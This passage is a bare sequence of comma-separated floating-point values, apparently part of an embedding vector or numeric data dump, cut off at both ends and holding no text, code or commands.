7162,0.0133534195,-0.0041988287,-0.025866251,0.006336585,0.0016808476,0.035419084,-0.000592851,-0.016407834,-0.0053469045,0.028369015,0.009638182,0.008521783,0.0044532954,-0.03298922,-0.0052303206,-0.025082512,-0.0072960397,0.0010007678,0.0036143877,-0.008305852,-0.030606205,0.0024737564,-0.023797527,-0.011746088,-0.018997366,0.0062178243,-0.0002619033,-0.015446694,0.018735036,0.027348552,0.007585823,0.0048164376,0.0077735307,0.010629232,-0.01647274,-0.033550028,-0.023734592,0.0088130515,-0.004541123,-0.03140999,-0.017138198,0.017366577,-0.010842113,-0.0034678015,-0.0047717174,0.014862157,-0.0017919997,0.0032918376,0.017022494,0.039647263,-0.0030613279,-0.013403962,-0.008880559,0.013868921,0.031419482,-0.020073077,-0.011722044,-0.00620558,0.029728647,0.031705916,-0.00976022,0.023294698,0.0072514224,-0.005749115,0.014274702,-0.009411685,-0.009529652,-0.02505212,0.012425643,-0.032231577,0.0005104089,0.00015709302,-0.017891658,0.020585576,0.007585874,0.024018556,-0.013000446,0.023340067,-0.005749416,0.00006579094,0.014063043,-0.013947641,-0.031999346,-0.015812231,-0.0090295635,0.0027402686,-0.009832549,-0.009390334,0.045134693,0.007739586,0.0024200948,-0.031910505,0.016599994,0.014063591,-0.0448809,0.012065016,0.021189325,-0.012338436,-0.01383604,-0.020384112,0.010533802,0.004924595,-0.0020707573,-0.0155090075,-0.005696029,-0.0035967277,-0.026878266,-0.017170956,0.011616413,-0.014531598,-0.011239507,0.030126037,-0.01960307,0.03300344,-0.019937389,-0.013916993,-0.035764236,-0.013052605,-0.018879293,-0.0057922653,0.0055892696,-0.0013748422,-0.008337663,0.015143859,-0.0119247725,0.008799199,-0.0058819503,-0.0057921084,-0.0061549544,-0.02716804,0.023819815,0.038174484,0.0029096252,-0.0134678595,0.011656935,-0.0023898683,0.0028298774,0.015664963,-0.015073278,0.03408172,0.0015999073,-0.0014916334,0.0073195635,0.0065484378,-0.009619968,-0.021881681,-0.0019944245,0.0009042225,0.011285136,-0.013459087,0.055218093,0.0021489148,0.01995695,0.0053818435,-0.0098374225,0.00086697773,0.03877922,0.05956414,-0.00043817514,0.024850463,0.0026653027,-0.0059563345,-0.0013990739,-0.003996474,-0.0014721467,0.014387087,0.008906954,-0.006032891,-0.010730586,-0.010113581,-0.017053112,-0.0059052063,-0.013692014,-0.024373269,0.012440573,-0.0006456425,0.0021769204,-0.0035107327,-0.0031468337,-0.010779484,-0.00750526,0.028179433,0.0050003864,0.02847233,-0.00039618302,-0.008539829,0.038621,0.00495195,-0.00028682576,-0.015882272,-0.0006531306,-0.027163167,0.0007441954,0.0057516075,0.022752848,-0.010072112,-0.014915613,-0.018097505,0.023909248,-0.017901644,0.021933746,0.0017682462,-0.02522456,-0.0005714563,0.004636335,0.0047404855,-0.027330833,0.012598847,-0.004902309,0.0046550888,0.019833136,-0.021213885,0.031544276,-0.000699551,-0.00578189,0.01889823,-0.011434039,-0.012679382,-0.020061422,-0.0043836082,0.0029788245,-0.009038241,0.008551364,0.0011079932,-0.027267594,0.0012049387,-0.0050060046,0.023007022,-0.0024723075,0.0141741,-0.00026205412,-0.0040569394,0.017937774,0.012173156,-0.0037969206,0.004675952,0.013645182,-0.010394189,0.011232918,-0.02114636,0.0072012804,0.009954527,0.022610752,-0.010632789,0.009390391,0.00073671254,-0.0013810985,0.0031904422,0.0008062545,-0.0055338475,0.030479426,0.0092616,0.0028940889,0.010219739,0.03647441,0.014135606,0.018707346,-0.002302797,-0.016522918,-0.022234337,0.0086873155,0.006684447,0.00058455387,0.00900077,-0.0013867359,0.016107999,0.010397591,0.012130661,-0.0067466083,0.006568678,-0.020969842,0.030670783,-0.0071444204,-0.026237423,0.009523584,0.07054421,0.008906111,-0.019400414,0.01600305,-0.007405596,0.002845705,-0.019851143,-0.010668956,0.014112892,-0.01543512,-0.005161702,0.0030242123,-0.012852414,0.019217283,-0.022759216,-0.009380221,0.005733236,-0.02483955,-0.002367359,-0.00078079983,-0.015802488,-0.0018025716,-0.024531249,-0.0060256333,-0.014641655,0.012192724,-0.016338404,0.006049305,-0.009470292,0.0013684114,0.0009524259,0.0023023596,-0.05322062,-0.00018103761,0.00469434,0.009105603,0.0021063162,0.04495707,-0.020509116,-0.044326995,-0.0063299276,0.025180927,0.0017682633,-0.029537108,-0.0085254,0.00894248,-0.013201927,0.0033957066,-0.030059032,-0.025746116,-0.009774061,-0.018059837,0.005826808,0.024041664,0.013419492,0.01946048,0.013578766,-0.012866347,0.025028042,0.006635905,-0.0086081745,-0.015762875,0.018134927,0.00953071,0.0010503419,0.010035602,-0.001653766,-0.03058631,-0.004975013,0.0071971063,-0.0047205067,-0.012710072,-0.0024469886,0.004097108,-0.0048356787,0.0017698935,-0.0020889633,-0.0024280115,0.012915092,0.0057573044,-0.013681939,-0.00081504334,-0.008040908,0.02157308,0.01286182,-0.01707351,-0.011663487,-0.018830588,0.013982205,-0.011831331,-0.012806503,0.010373134,-0.0003858057,0.011894227,0.017735187,0.03293689,0.0010103439,-0.0046579177,-0.012879248,0.03196467,0.0051015834,0.00041766197,0.005382949,0.015998937,0.017551394,-0.0007354681,0.020736903,-0.011476584,-0.013442422,0.012574497,-0.014675551,0.02407912,0.009173887,-0.024846049,0.0037975365,0.012493615,-0.03321276,-0.011607794,-0.013376723,0.01906609,-0.008374124,-0.00059433846,0.019037154,-0.0037499468,0.027086727,-0.003888495,0.0044232043,0.006410109,0.027689306,0.0049263793,-0.010878664,0.015308818,-0.014071585,0.00480548,-0.017665833,-0.03114474,-0.015156517,0.0010991916,-0.018801823,-0.019081676,-0.005726825,0.006732076,-0.016615227,-0.010543485,-0.007894683,-0.013012834,-0.0006050236,-0.01827899,0.013469867,0.008860578,0.018466042,-0.007554308,-0.009810228,-0.014530298,0.013014067,-0.008169233,-0.02565993,-0.017021904,-0.03503409,0.008971084,0.0037121759,0.0065974304,0.017662922,-0.021802962,-0.008536334,-0.021236638,0.0047473344,0.021797173,0.033440687,-0.030762767,0.021576315,-0.0009297153,-0.0014440228,-0.006272639,0.013450421,0.033885248,0.0016759775,0.0056100814,-0.0074642147,0.0044516055,0.0022978836,-0.0015556301,-0.15305284,-0.020952808,0.026980702,-0.027335634,-0.0059745973,0.0071905004,0.0014231761,-0.006863837,-0.0065083927,0.021045497,-0.031736728,-0.029167779,-0.0047525116,-0.036961995,-0.00411166,0.008866071,0.0053544934,-0.012228987,-0.009122554,0.031598087,-0.0032471053,-0.0162194,-0.013225857,0.013454434,-0.012511814,0.011298454,-0.0024714002,0.013030795,-0.038192876,-0.011003323,-0.00049580535,-0.009371968,-0.0008354745,-0.020793721,0.0062925494,0.035855927,0.028260136,0.002461997,-0.02080694,0.0010034597,0.017782738,-0.046411898,0.03518082,0.0012049496,0.019162966,0.0013349105,-0.024326162,0.011776696,0.021773519,-0.015600302,0.03395266,0.012099204,0.0025145668,-0.0130876135,-0.012219143,0.03509072,-0.0064947307,-0.0026252908,0.009152769,-0.007386341,0.020159055,0.021100406,-0.027504742,0.0008956134,0.01662477,0.0075528747,-0.016733969,-0.0012864821,0.017991317,-0.023453197,-0.020531008,0.010470634,0.019677248,-0.0034981212,0.00883772,0.005055264,0.03451905,0.0014768206,0.0051392037,0.028195433,-0.005877439,-0.0005784773,0.036522184,0.009621789,0.017586011,-0.016254356,-0.0066155633,-0.0063047903,0.018679345,0.046028588,0.015424117,-0.010106328,-0.026476867,0.0062310714,-0.008410801,0.00839655,0.02328565,-0.013252441,-0.013727581,0.0029932952,-0.008180903,0.0012934061,0.023840345,-0.016590377,-0.020485261,0.008430172,0.0051663164,-0.032136172,0.0072922874,-0.014563553,0.010284022,0.013479387,-0.018140566,0.01145096,0.0035861153,-0.005937994,0.019480119,0.011893258,0.00841056,-0.0065565077,0.018133502,0.0120828925,-0.023521911,-0.047439843,-0.0007244474,0.0063673905,0.017524326,0.0050585326,0.028985618,0.013760286,-0.023651863,0.062273376,-0.01406651,0.024034096,-0.016418131,-0.0067921956,-0.028703596,-0.015709918,0.018728515,-0.0023145578,0.0047411574,-0.00748806,-0.0051472466,0.026601678,0.0009133359,0.006156544,-0.003923277,0.0122725265,-0.014902805,-0.036018573,0.0042204172,0.031172974,-0.004360286,0.013462622,-0.018653018,-0.008652935,0.0083272625,-0.0025595555,-0.024213552,-0.015031484,-0.0033091223,-0.010525138,0.022124585,0.002387104,-0.04961487,0.01842278,0.0011905952,0.02162224,-0.02649762,-0.06035354,0.0060748216,-0.011737155,-0.0029011613,0.010196249,-0.014199993,0.006689936,0.008034449,-0.0072111837,-0.04950816,0.012857192,0.013090303,-0.034916945,0.0003630512,0.011851567,-0.012337965,0.012714723,0.007919812,0.001180244,-0.005572927,-0.007356374,0.03513856,-0.0026262442,-0.006748832,-0.013949366,0.0020078346,0.0013343825,0.00014938926,-0.006207756,0.0063262726,-0.009970998,0.020801283,0.0009853692,0.016316494,-0.017830933,-0.047679458,-0.01637803,-0.0011304013,0.017210338,0.006861225,0.007637735,-0.017320277,-0.02570408,-0.013560333,-0.008935796,0.02522701,0.014722935,0.017698124,-0.01129283,0.005744503,0.071316466,0.001259946,-0.020072576,-0.035831686,-0.023286361,0.04116929,-0.015477255,0.0007301284,0.010204414,0.003813208,0.004735932,-0.0025640484,-0.018920226,-0.02555024,0.0042153047,-0.011494816,-0.010868545,-0.018378083,0.008059925,0.011336988,0.0023491243,0.00824931,0.012533891,-0.0150353415,0.016107162,0.02624445,0.0017293423,0.0073348857,-0.005792632,-0.0066685765,0.016553631,-0.039782558,-0.0037201175,-0.021520538,-0.021177901,-0.0036063564,5.97272e-7,-0.021349877,0.0014847753,-0.012778358,0.020563923,-0.010426858,0.0039125485,0.003895017,-0.014758456,0.0014261678,0.008419929,-0.002496705,-0.03587903,-0.0038773832,0.0058245896,-0.0064037526,-0.007528451,-0.0069216844,-0.013239574,0.011741419,0.0038923377,-0.005426691,-0.021236774,-0.002989509,-0.019228548,-0.011318067,0.018477201,-0.025228754,-0.0046878154,0.0035174217,-0.0005606574,0.011828654,0.0051301518,-0.01338999,-0.00962706,-0.0349147,-0.0013595914,-0.004490427,0.0078062615,0.004424106,-0.026713792,0.02560819,0.008994215,-0.019914066,0.0055144993,-0.005881801,-0.009149572,-0.0014347734,-0.004161657,-0.0074093477,-0.03783512,-0.012094899,0.018968215,-0.0025786224,0.008818554,-0.008194583,0.0017385134,0.006580639,0.007725728,-0.007289973,-0.0036317203,0.005909014,-0.008754179,-0.019749183,-0.015713125,0.018628547,0.007965352,0.0010038996,-0.00843166,0.05352554,-0.0028270036,-0.02141914,0.033853482,0.0020761343,-0.009892425,0.008443064,-0.01012597,0.007404552,-0.011607825,-0.041983835,0.012592537,-0.005430662,0.020454355,-0.022594057,0.001743873,0.025858968,0.012125921,-0.008843906,0.0007630381,0.008729612,-0.017311463,-0.0133018,0.021478498,0.0009583512,-0.0022685097,0.0014883601,-0.0057846946,-0.0053014313,0.014717871,-0.03225146,0.00889542,0.00063126633,0.015934004,0.016654275,-0.013750696,0.007693526,0.007081714,0.023873571,-0.009320821,-0.0015776422,-0.004426915,0.0013703558,-0.035475355,-0.0134353535,0.009971856,-0.007877227,0.0036022053,0.01185426,-0.0037701668,-0.016608829,0.009624852,0.012245254,0.008469136,0.00839985,0.009544309,0.01694141,0.0037144404,0.010909856,-0.0070404685,-0.04457896,-0.010186426,-0.00468312,-0.0034048166,0.018444078,0.002366219,-0.00846917,0.010826099,-0.0051072114,0.019291503,-0.0050464063,0.017712202,-0.0026909595,0.021770876,-0.00033461727,0.006060038,-0.034614917,0.011025432,-0.014897593,0.005991451,0.03202831,0.0038353098,0.021166388,0.0075454535,-0.013861269,-0.057436243,0.0012194028,-0.04231488,-0.04326177,0.028089587,-0.0040148743,0.0004901584,-0.008657238,-0.0063560205,0.0060590142,-0.010248741,0.0067537087,-0.005325342,0.02470457,0.025709694,0.009689524,0.013515885,-0.020641807,-0.0049504386,-0.0014969616,-0.027690625,-0.012927936,0.00036458301,-0.02576555,-0.0008951096,-0.023166683,0.002554817,0.022916304,-0.0017781927,-0.02157684,0.031710375,-0.046739493,-0.0072283843,-0.021296866,-0.009832761,-0.017864998,-0.004095933,0.0048749223,-0.006720569,0.13786055,-0.020034757,-0.014978356,-0.009095853,0.010011136,-0.003944111,-0.017464941,0.03284056,0.034158364,-0.025729949,0.015406427,0.009402623,0.024979677,0.015063113,0.0010640236,0.010015192,-0.01190639,0.017130747,-0.004207424,0.01209548,0.009812728,0.029391643,0.0004627681,-0.0016337094,-0.0004537621,0.00907108,-0.028451765,0.006716559,0.0035018174,-0.02124098,0.038773634,0.018018654,-0.011311808,-0.001828418,0.0006276505,-0.03068038,-0.011463988,0.013686232,0.0021180273,0.008607127,-0.022984553,0.0018936903,-0.015967209,-0.016733658,-0.0030163105,0.0016889322,-0.016908199,-0.020617446,-0.009406831,0.0043100184,-0.017089777,-0.013337485,-0.028554773,0.003915567,-0.019980637,0.016160693,-0.0013516408,0.016222894,-0.007561717,0.0009193493,0.005633931,-0.016684197,0.01832051,0.012863314,-0.012882753,0.009626455,0.0148810465,-0.014809026,-0.008113503,-0.024987252,0.006845469,0.010226733,0.0120015815,-0.0046515237,-0.005543726,0.020991273,-0.001155777,0.030558309,-0.018539833,-0.0246517,-0.022353634,0.00066076225,-0.038568895,-0.008638506,-0.019441606,-0.010400371,-0.0050623375,0.016336499,-0.001422078,-0.004327133,-0.011678033,0.0023749692,0.017597115,-0.009989877,-0.026307479,-0.010054103,0.010580964,-0.0073967543,-0.01522479,-0.00034967673,0.01752008,0.023314266,0.015040241,0.036853526,-0.028204098,-0.0016742091,0.013898266,0.015263888,0.007913097,-0.0025942177,0.007744622,-0.020943884,0.009940087,-0.022580931,-0.04559056,-0.0031903135,-0.0066599376,-0.03237348,-0.026340168,-0.0028719055,0.010873911,0.005236295,-0.00043984904,0.0086883325,0.0061847884,-0.03587421,-0.002538018,-0.010350746,-0.04203818,-0.009050324,-0.0021571019,-0.021931376,-0.0065703257,-0.0011958691,-0.018840715,0.0034887893,0.0033520248,-0.0060445964,-0.0065369974,0.0017214947,-0.011494731,0.017343065,0.029557198,-0.0068255626,0.014257511,-0.0016914986,0.009561732,0.0031252676,-0.019758414,0.008105811,0.024691012,0.00033197392,0.00996838,-0.006041145,0.00890011,-0.01479923,0.014666956,0.012617483,0.022891803,0.0072756787,-0.03387109,0.0017316054,0.010427117,-0.005927788,-0.03587087,-0.00043103698,0.007476408,0.01119282,-0.013830674,0.007837406,-0.05269347,-0.013980003,-0.0172152,-0.0169804,0.025104973,0.00018355636,0.006224997,-0.00770374,-0.00610654,-0.009618947,-0.01654162,-0.019051256,0.010475941,-0.009764897,0.030653497,-0.015767077,-0.009983538,-0.0042205346,0.0052822186,-0.021851143,0.0067539755,-0.013001365,-0.013915217,0.023133498,0.009295504,-0.013465174,-0.022243878,0.029128663,0.0113077285,0.021111585,0.003422888,-0.0035231381,-0.019050892,0.00020967286,-0.0072166244,0.006195023,0.005920462,0.021799961,0.011127634,-0.014903781,0.005463565,-0.005783727,-0.0295373,-0.020018904,0.0037573592,-0.016512156,0.09431756,0.003085813,-0.03849574,0.012365761,0.03718324,0.0054151523,-0.009450538,-0.0086621,0.029625855,-0.011662268,-0.013343377,-0.021324929,-0.018625041,-0.005854078,0.043931425,-0.006213102,-0.0012150971,0.021644445,0.000044133034,-0.048025794,0.0015037346,-0.0064814724,0.023067733,-0.029169276,-0.0027158814,-0.008531045,0.021907482,-0.0003755723,0.014487707,-0.006004169,0.013740876,-0.009045363,-0.024165232,0.010373173,-0.011158199,0.012046204,0.005748062,0.009637343,0.0077383146,0.0041230735,-0.00069968135,0.010562435,-0.008368268,-0.004354103,-0.028369548,0.03694184,0.032004897,0.023238758,0.004588336,-0.008981528,0.015252291,-0.00088964606,-0.004987744,-0.010876133,0.040945664,0.017905334,-0.017973583,-0.011375173,0.035312828,-0.000946067,-0.013630493,-0.024986804,-0.010841301,0.00894413,-0.0030578086,-0.0114533,-0.0139574,-0.029080462,0.007885251,0.037280682,-0.002225661,0.020155223,-0.0046641794,0.013238707,-0.016020946,-0.0032803728,0.02121462,0.008908286,0.0071015083,-0.0021027934,0.005596338,-0.024054676,-0.015373373,0.027877137,-0.0026639854,-0.004796687,-0.008961331,0.018372811,-0.010217187,0.007884562,0.010027046,-0.01678063,0.0033368962,0.0076320567,-0.02176662,0.019841572,-0.007984026,-0.1663994,0.0002149752,0.037837032,0.00041232226,-0.029983275,-0.004603889,0.016654264,-0.0035627289,-0.0027104032,-0.0027395312,0.0007141989,-0.008292107,0.0033334955,-0.0043068286,0.006905441,-0.0086987335,-0.016140202,-0.011267091,-0.0005312416,-0.013993699,0.008753847,-0.026363874,-0.027840313,0.009307885,0.023984445,0.0055035967,0.010841567,-0.005558659,0.054777622,0.0068687885,-0.011195618,0.012820592,-0.02263916,0.027794164,0.010975323,-0.006886252,0.031681515,-0.0021659336,0.00854457,0.015628016,0.00805128,-0.010466498,-0.0017196892,0.009023762,-0.010140965,0.00805508,-0.018721296,0.021690251,0.03194219,-0.0009963547,-0.0059416406,-0.0066888584,0.027160373,0.0068773283,-0.0036584036,-0.03436265,-0.010409783,0.014852693,0.014871191,0.016523063,0.0033509177,0.0007309417,0.016191984,0.0026191978,-0.01013399,0.027567228,0.019413201,-0.0018062902,0.010971334,0.0015474173,-0.015265562,0.009327413,0.008064532,0.012634785,0.020924902,0.017052552,0.00091874,0.011418962,0.001751807,-0.0019219257,0.0066968934,-0.01197857,-0.013546139,0.030927235,-0.0453565,-0.018294936,-0.0053017666,-0.00081718946,-0.010004662,0.028774794,0.0018007711,0.027795956,-0.014927447,0.00531759,0.025424248,0.009824916,0.011698165,0.008918017,0.0085317,0.003186114,-0.020557871,-0.005892791,-0.008350844,-0.0041913562,0.0030601318,0.00034845967,0.0031798386,-0.013574927,0.016439157,0.0031402211,0.047156908,0.0061806077,-0.0127816405,0.013686147,-0.041888714,0.006451325,-0.01799984,-0.014676841,-0.011534149,-0.022240277,0.007838119,-0.011129288,0.014972776,0.0137520945,-0.042280816,-0.0012997589,-0.027893966,0.004205983,0.004034281,-0.020185206,-0.014822704,0.005429395,0.024935912,-0.012824341,-0.010549241,0.008115931,-0.0040149717,0.0055597816,0.01244619,0.005362016,-0.013845054,-0.02010199,0.005886403,-0.010507582,0.002550746,-0.0076773656,-0.013063414,-0.018279811,-0.017098272,0.008288396,0.0025290044,0.009819098,0.01775291,-0.024398869,0.02513014,-0.0033635676,-0.006984123,0.0043996633,-0.0060758973,0.011497405,0.0033387889,0.007234788,0.011259996,0.0019424728,0.015601725,0.002180589,-0.010394501,0.0019608918,0.005787825,-0.0096350955,0.012896648,-0.001963319,-0.009022011,0.017104363,0.016238311,0.024159025,0.022722734,0.024580933,0.013750266,0.011420136,0.014475855,0.009359729,-0.008594018,0.00059001875,-0.020077512,0.009358587,-0.015042113,-0.005111522,0.018096214,0.01119101,-0.0028790985,-0.00025127846,0.009047052,0.00049214956,0.008314116,0.02008805,0.00037719213,-0.015934194,0.020851081,0.007594442,0.008198564,0.010694737,-0.015255967,-0.0030308033,0.017150894,-0.00085369655,0.00403171,0.024354108,-0.004209206,-0.008875507,-0.0026143657,0.020830272,0.0012657176,0.009805736,0.015572338,0.042418648,0.00643641,-0.029417118,0.010577671,-0.0014981314,-0.0056515336,-0.01605107,0.017271852,0.024664005,-0.0078928955,0.039602138,0.009394241,0.009140773,0.0010784017,0.016441852,-0.0066889436,0.017984347,-0.01534883,-0.0123807825,-0.0027278096,-0.014600361,0.03615549,-0.00995241,0.00629606,0.027146988,0.010468899,0.0058669066,0.008944319,-0.007778527,0.034871064,-0.004522764,-0.007386082,0.0038778393,0.0034387128,0.016687162,0.0029470555,-0.008866631,0.014173775,-0.025270252,0.004543298,-0.004934301,0.016348556,-0.015518821,0.0024179746,-0.0044134753,-0.028075596,-0.022838814,0.002710916,0.0080495775,0.000723173,-0.032079123,0.013746568,-0.048976246,0.000091006244,0.009713447,-0.015886294,-0.0037209776,-0.016626427,-0.008351699,0.04796664,-0.0018170121,-0.0058762594,0.02095397,0.0020418053,0.009869497,0.01156182,0.0067637144,0.019420216,0.0022118082,0.026700823,0.013771935,-0.006679221,0.005875939,0.001456315,-0.0028422808,-0.010060624,0.011807531,-0.0091586,-0.014624575,-0.011359787,0.028296521,0.02348487,0.002402615,0.0052813464,0.011408908,-0.0040228385,-0.004071169,-0.0068807504,-0.000716287,0.005110839,-0.01929678,0.0008730956,-0.011035103,-0.023224149,-0.030059349,0.0011876675,0.01845569,-0.014185796,0.00641705,0.00899729,0.013230468,-0.019179491,0.0062231207,-0.0033723651,-0.006824344,-0.011224523,-0.011680149,-0.014916286,-0.010190768,0.027772851,0.02092444,0.017969362,0.0015446668,-0.016020063,-0.0114978,0.03087306,0.13712314,-0.009003524,-0.027086888,0.0024946115,-0.017504327,0.022362212,0.012222887,-0.0073617115,0.0006489978,0.0008953247,-0.004342652,-0.0063147102,0.019069422,0.011760463,-0.011300947,-0.0001912156,-0.020371856,-0.014078793,0.015939133,-0.021441195,-0.014616261,-0.0210534,0.030159282,0.0112012755,0.029574022,0.0017650733,-0.020238154,0.019666033,0.006948979,-0.024340596,0.02499952,0.011642086,-0.022299591,-0.0071264617,-0.014871118,-0.005376983,-0.0046761287,0.004295287,-0.010019106,0.0032383853,-0.0060224063,-0.013161813,0.013354943,-0.0040401686,-0.03915701,-0.004101841,-0.0011238874,-0.009289465,0.01273726,0.02773388,0.000031912754,0.016869916,-0.006630232,0.0054546865,-0.016253464,-0.011270142,-0.013393163,0.016565174,0.023403563,-0.013870457,-0.011024876,-0.009844567,-0.007908027,-0.011664196,0.0014152513,0.016920622,-0.013803648,-0.02680188,0.008279213,-0.01815833,0.0095857335,0.0038189474,-0.009449506,0.030257631,0.009848198,0.00083924044,0.010572741,-0.034391407,-0.012681184,-0.0076322304,-0.0035334937,0.016458213,-0.008014336,-0.03881686,-0.009977208,-0.007827372,0.00797949,0.008357482,-0.008914526,0.012007498,-0.0070046876,-0.0075655063,-0.021972239,-0.016406858,0.002530858,0.0057015847,-0.0052950783,0.012272715,0.006623756,-0.0066984203,-0.0054516466,-0.0027952245,0.0044530816,0.003305096,-0.024843253,0.0005056351,0.02947344,-0.010335847,-0.015416466,0.0035769152,0.0027614068,-0.005610367,-0.0107370755,0.005700898,0.0003640494,-0.010833776,0.0013049176,-0.009369417,-0.0038134386,-0.020519016,-0.022144584,0.020747198,0.0021806217,0.01824311,0.02349452,-0.008999077,0.01163358,-0.018090768,0.032328688,0.012840597,0.018530795,0.018775292,0.01987369,0.008695979,0.008768041,0.007723732,-0.0120405825,-0.018787598,-0.0038521157,0.003980409,0.018716143,0.0116276285,-0.015345599,0.03372572,-0.030245954,0.01627439,-0.00015123244,0.00200442,0.001691347,-0.004621065,-0.0066231247,0.018757174,-0.002019984,0.007590431,0.008465178,0.018837342,0.016791329,-0.0024410794,0.008471353,0.004722427,-0.0040183193,0.024378523,0.005190028,-0.0065485802,-0.024961244,0.008259843,0.0055493964,0.045036145,0.023643343,0.016898135,0.019237543,-0.0073510725,-0.016322425,0.020712817,0.012315485,0.029007586,0.025729317,0.02437289,0.014530678,-0.002937784,0.004936301,-0.00447853,-0.0051985276,0.042446706,-0.0023111617,-0.004678934,-0.028418478,0.016558722,0.022514958,0.014308302,0.000534583,-0.011625944,0.010951082,-0.019901583,0.008088598,-0.010875064,0.00091175555,0.0021765307,-0.008495371,0.008554735,0.00802774,-0.0022162122,-0.018689483,0.0020262375,-0.0075412854,0.029046202,0.012346221,0.01674107,-0.010252715,0.018883443,0.022406796,0.00015327551,-0.02398646,0.0038582457,0.01392256,-0.014388326,0.023251832,0.008025951,-0.014384683,0.017089522,0.019376159,0.02504878,-0.0058030454,-0.019369947,-0.007638929,0.0024433923,-0.006348963,-0.0055165966,-0.0013285194,-0.0054509724,0.0074718767,0.0134670185,-0.013609942,0.0029983104,-0.01685996,0.021977955,-0.0023850973,-0.008383166,0.0030757166,-0.03383646,0.008323976,-0.0022945798,0.0028539214,0.012563221,0.0066720108,0.01127753,-0.017591076,0.001967256,-0.023430206,-0.0017723101,-0.0046583544,-0.011876358,0.036676623,0.008873072,0.020941274,-0.011953859,0.0026205059,0.07888888,-0.003010597,-0.010839048,0.01752109,-0.021510057,0.00097216683,0.0016064362,-0.008807534,0.0044535454,-0.017314652,0.025179084,0.0023955118,0.024187725,-0.0024618942,-0.036126442,0.014568499,0.005334748,0.0014937213,-0.0020941605,-0.028745957,-0.0073926994,-0.026895525,-0.008252569,0.022337569,0.01999607,-0.095046975,-0.008349766,0.020780018,-0.013662481,0.008745512,0.0064730956,0.04128484,0.004522077,-0.014645363,-0.012414466,-0.012565218,0.022258209,-0.01893538,-0.01617033,-0.031820267,0.041823298,0.009012676,-0.0064555444,-0.004263244,-0.020394307,-0.013552202,-0.010804234,0.004825419,0.0056286063,0.028089281,0.012862842,0.013199125,-0.010090648,-0.010501765,-0.00588547,0.0025150946,-0.0014694883,0.0038492975,0.025906209,0.025304943,0.016493876,-0.0019167928,-0.01833148,-0.007287243,0.020092081,-0.0021954176,0.00066622125,0.00819708,-0.04058561,-0.013777412,0.012669938,0.0005113746,-0.0013711709,0.010841522,0.00064577715,-0.017703727,-0.0072590676,0.010260472,-0.0011558923,-0.014367346,-0.0046186233,0.014399038,0.007247422,-0.004234489,-0.014626024,0.001560793,-0.0060207867,0.022275291,0.0004599204,0.012503157,0.0055831736,0.012219706,0.0023579632,0.017640043,0.0038283363,-0.008286824,-0.002753795,-0.01710338,-0.011229099,-0.01003946,0.0060155555,0.0030762542,0.030069252,0.0026808204,-0.004969617,0.0064592385,0.02349367,0.024783107,0.03250553,-0.009986552,-0.0060439254,0.022712745,-0.006052454,0.01432091,-0.016774511,0.017486861,-0.0030548489,-0.0073595163,-0.0007616443,-0.010206036,0.00950853,0.0333541,0.016852677,0.017353455,-0.011101881,0.0028990675,-0.008150525,0.01149336,0.0016460879,0.0021317496,0.029207308,-0.050008178,0.0054341275,-0.0076557975,0.00089537277,0.00027304763,-0.0017,-0.0039279265,-0.010498447,-0.00990679,-0.00011193832,0.0065610763,-0.0026561301,-0.0025134773,-0.018517636,-0.034403104,-0.011317281,-0.017152872,0.0041522826,0.010415405,-0.005358542,0.0022058475,0.0012703397,-0.00090275664,-0.017482065,-0.0042976276,0.020710673,0.011489945,-0.02749404,0.011139776,-0.0011172394,0.01674961,0.010104584,-0.041977674,0.012077279,0.013007356,0.016704332,-0.007368363,0.013551204,0.005669969,-0.030840226,-0.029088423,-0.0058921915,0.010848413,-0.007668365,0.038258854,0.010589308,0.021084925,-0.00947651,-0.0042335857,0.0028852073,0.017598057,-0.026108986,-0.0010000841,0.012683881,0.00091131055,0.010661549,-0.00018808685,-0.008009103,0.023487426,-0.024014648,0.008343448,-0.013075476,-0.00085150707,-0.0078040375,0.018760515,-0.014727472,0.03181142,-0.0055537587,-0.016196813,-0.008925637,0.008283899,-0.015224775,0.00065286655,0.019112954,-0.000061997926,-0.019469123,0.004428345,-0.0014567813,0.01028043,0.0077811913,0.015931416,-0.0037017493,-0.03969655,0.010749774,-0.009909827,-0.0045289905,-0.006263739,0.0024917175,0.009462155,0.011825888,0.0020271721,-0.0010270088,0.013166167,-0.006421248,0.0068146833,-0.0040336493,0.033183992,-0.011852545,0.0029947772,-0.013005466,0.0057509937,-0.0048528602,-0.015572302,0.026373738,0.0066468976,0.02263682,0.0053625507,-0.0047145393,-0.0009589278,0.010171802,0.013030455,-0.010378384,-0.008006432,-0.024680473,0.005956939,0.0048917136,0.008682239,-0.00087632803,-0.0047388854,-0.02048145,-0.0048835776,-0.013941546,-0.0027062173,-0.020890744,0.008856959,0.013263701,0.0022424364,0.009959638,-0.016336944,-0.019140983,0.011495887,-0.021432785,-0.0082113035,-0.0047062114,-0.0012612619,0.018094776,-0.021455767,0.019979035,0.030149767,-0.020344004,0.0018381189,-0.01640857,0.020546207,-0.016598849,0.0051856525,-0.023751298,0.008065584,0.0013337203,0.036187477,-0.0028791684,-0.012874098,0.04610601,0.0025799472,0.004548473,-0.011704084,0.0131168375,-0.0031377894,0.016615786,0.006190679,-0.0064344103,0.00994328,0.000022115513,-0.007215566,-0.015153128,-0.0013441658,-0.116115145,-0.039108634,-0.007823022,-0.0011299044,-0.007140467,-0.014941571,0.021470917,-0.014442339,-0.008158946,-0.0032787623,0.0071610664,-0.008094924,0.037634283,0.0462421,-0.018438764,-0.00031505944,-0.02743635,0.017768322,-0.00511551,0.018607974,-0.01371485,-0.0006907862,0.0054053343,-0.023634551,0.025206577,-0.0064007454,0.0017283224,-0.021428758,-0.01942631,0.025806084,0.016082725,-0.0250023,-0.010010594,-0.028117487,0.007269553,-0.018011382,0.013543873,-0.009209494,-0.0009588151,-0.021978991,-0.0058124308,0.05950222,-0.0062309057,-0.020873077,-0.020794075,0.0030091254,-0.038009178,-0.015753256,0.015818156,-0.008990883,0.004437703,0.017483622,0.01062588,0.02376803,0.031077322,0.012904767,-0.0012825847,0.0022460879,0.04018247,0.010838207,0.015891377,0.015382393,-0.014034558,0.016011778,-0.00940974,0.0016931505,0.006906452,0.0028944786,-0.021570917,-0.0052549765,-0.00855663,0.014178104,0.027934618,-0.02577044,-0.02031076,-0.019837504,0.02254297,0.004504281,-0.013641259,-0.029785287,-0.0019367633,0.013872676,-0.003688073,0.009546683,0.016127445,-0.0017640286,-0.020190448,-0.0064067063,-0.018789096,0.045360237,0.02369978,0.013487491,-0.027498934,-0.01563263,0.019226016,0.0064639025,-0.0041911993,-0.0011568302,0.00048322044,-0.022109559,0.027196087,0.006274383,-0.007004207,-0.010955445,0.029350407,-0.034865346,-0.0050939326,0.008275521,-0.0013314754,-0.